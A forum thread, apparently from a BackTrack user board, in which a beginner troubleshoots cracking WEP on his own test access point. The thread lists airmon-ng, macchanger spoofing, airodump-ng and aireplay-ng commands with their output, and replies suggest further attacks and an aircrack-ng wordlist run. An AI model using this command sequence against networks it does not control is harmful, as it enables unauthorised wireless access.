Results 1 to 6 of 6

Thread: Packet Injection

Hybrid View

  1. #1
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    1

    Default Packet Injection

    Hi all,

    First off please be tame with me I am a new Backtrack 4 user and I知 also fairly new to Linux (although have been lightly using variations for the past 6months)

    Sorry if this should have gone in the hardware section although the 'n00b' area seemed more fitting.

    The problem I知 having at the moment seems to packet injecting to AP's.

    I have been reading up on various websites/videos on how to crack wep.

    I started by cracking my 128bit wep key on my mobile phone tether. I managed this is under 7 mins (not bad for a first go ) but had forced traffic from multiple clients by simultaneously downloading large iso files.

    I have now moved onto my next step in my education and setup a 2nd AP at my home with basic wep encryption again. This time however the plan is to have no traffic on the router so I have to packet inject.

    Here is what I知 doing so far.

    - airmon-ng
    - airmon-ng stop wlan0
    - ifconfig wlan0 down
    - macchanger -m 00:11:22:33:44:55 wlan0
    - airmon-ng start wlan0
    - Airodump-ng wlan0
    - Airodump-ng --bssid (XX:XX:XX:XX:XX) --channel (channel number) -o ivs -w /root/(filename) wlan0

    New window

    - aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e [essid] wlan0

    My return message as follows,
    Sending Authentication request (open system) [ACK]
    Authentication successful
    Sending Association Request [ACK]
    Association successful :-) (AID: 1)
    - airplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0

    My return message as follows,
    Waiting for beacon frame (BSSID: 00:0F:3D:FDC:CE) on channel 1
    saving ARP requests in replay_arp-0823-060014.cap
    You should also start airodump-ng to capture replies.
    Read XXXX packets (got 0 ARP requests and 0 ACKs) sent 0 packets...(0 pps)
    So from what I understand so far my codes are correct? Yet I am unable to send packets to the AP?

    I'm Using an Aspire One Notebook using an Atheros AR5006X wireless card. Everything I can find on the net states this card is compatible with Backtrack and can packet inject.

    So hopefully this is where some of the more experienced lot are step in and point me in the right direction before I pull my hair out. Is it my card? Are my codes wrong?

    Many thanks,

    - Steve

  2. #2
    Junior Member
    Join Date
    May 2009
    Posts
    61

    Default

    try aireplay-ng -2 -p 0841 attack you can see whole code on aircrack-ng wiki.

    This can help not all ap have same behaviour.

    also try clientless wep attack. For this use: fragmentation and chop chop attack this can use when there is only wired client. So then you will have larger picture what all types of attack can someone use in wep cracking and also pros and cons and when is some attack good and when not.


    P.s. - why you change your mac its not nessecary if you dont have mac filter enabled and if you control your lab this can help bad guys to hide his real mac making forensics job harder.

    Dont just retype code from other tutorials not knowing what is for what.

  3. #3
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    2

    Default How to use a "whitespace" on the bssid?

    Hi guys,

    Can you help me with my command line? i need to fogure out how to input a white space on the bssid?

    Example?

    aireplay-ng -1 0 -a (Internet"Whitespace"Wireless) -h 00:11:22:33:44:55 -e [essid] wlan0

    Thanks!

  4. #4
    Member mixit's Avatar
    Join Date
    Jan 2010
    Posts
    104

    Default

    @iw2012
    Google BSSID. It cannot have white space.

  5. #5
    Senior Member kidFromBigD's Avatar
    Join Date
    Jan 2010
    Location
    Texas
    Posts
    159

    Default

    Quote Originally Posted by MixIt View Post
    @iw2012
    Google BSSID. It cannot have white space.
    Correct. The BSSID is the MAC address of the AP, while the ESSID is the name given the AP by its owner. There are examples aplenty of spaces and other strange characters in ESSIDs.

    Handling those cases involves, usually, double quotes and such:
    Code:
    aircrack-ng -w wordlist.txt -e "Secure&Monitored" cap1.cap
    Cheers.
    You. Are. Doing. It. Wrong.
    -Gitsnik

  6. #6
    Just burned his ISO
    Join Date
    Aug 2009
    Posts
    2

    Default

    This is what was looking for..

    aireplay-ng -1 0 -a "Internet Wireless" -h 00:11:22:33:44:55 -e [essid] wlan0

    Thank you.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •